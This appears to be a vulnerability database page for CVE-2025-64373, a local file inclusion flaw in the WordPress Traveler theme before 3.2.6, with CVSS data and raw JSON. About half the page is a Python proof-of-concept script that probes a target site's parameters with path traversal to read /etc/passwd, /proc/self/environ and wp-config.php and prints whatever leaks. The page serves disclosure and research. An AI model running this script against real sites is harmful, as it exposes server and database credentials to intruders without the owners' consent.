Security Vulnerability Report
中文
CVE-2025-64373 CVSS 8.1 HIGH

CVE-2025-64373

Published: 2025-12-18 08:16:14
Last Modified: 2026-04-27 16:16:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in shinetheme Traveler traveler allows PHP Local File Inclusion.This issue affects Traveler: from n/a through < 3.2.6.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Traveler主题 < 3.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64373 PoC - WordPress Traveler Theme Local File Inclusion # Target: WordPress site with vulnerable Traveler theme < 3.2.6 # Author: Security Researcher # Date: 2025-12-18 import requests import sys from urllib.parse import quote def test_lfi_vulnerability(target_url): """Test for LFI vulnerability in Traveler theme""" # Common vulnerable parameters in Traveler theme vulnerable_params = [ 'st_theme_file', 'file', 'template', 'page', 'view' ] # Sensitive files to test test_files = [ '/etc/passwd', '/etc/hosts', '../../../../../../../../etc/passwd', '/proc/self/environ', 'wp-config.php' ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-64373 - Traveler Theme LFI\n") for param in vulnerable_params: for file_path in test_files: try: # Construct malicious URL payload = { param: file_path } response = requests.get(target_url, params=payload, timeout=10) # Check if file content is leaked if 'root:' in response.text or 'wp-config.php' in response.text: print(f"[!] VULNERABLE! Parameter: {param}") print(f"[!] File: {file_path}") print(f"[!] Response contains sensitive data") # Extract and display leaked content if 'root:' in response.text: print("\n[+] /etc/passwd content leaked:") for line in response.text.split('\n')[:5]: print(f" {line}") return True except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") continue print("[*] No obvious LFI detected with basic tests") print("[*] Manual testing may be required") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2025_64373_poc.py <target_url>") print("Example: python cve_2025_64373_poc.py http://example.com/") sys.exit(1) target = sys.argv[1] test_lfi_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64373", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:14.260", "lastModified": "2026-04-27T16:16:41.987", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in shinetheme Traveler traveler allows PHP Local File Inclusion.This issue affects Traveler: from n/a through < 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}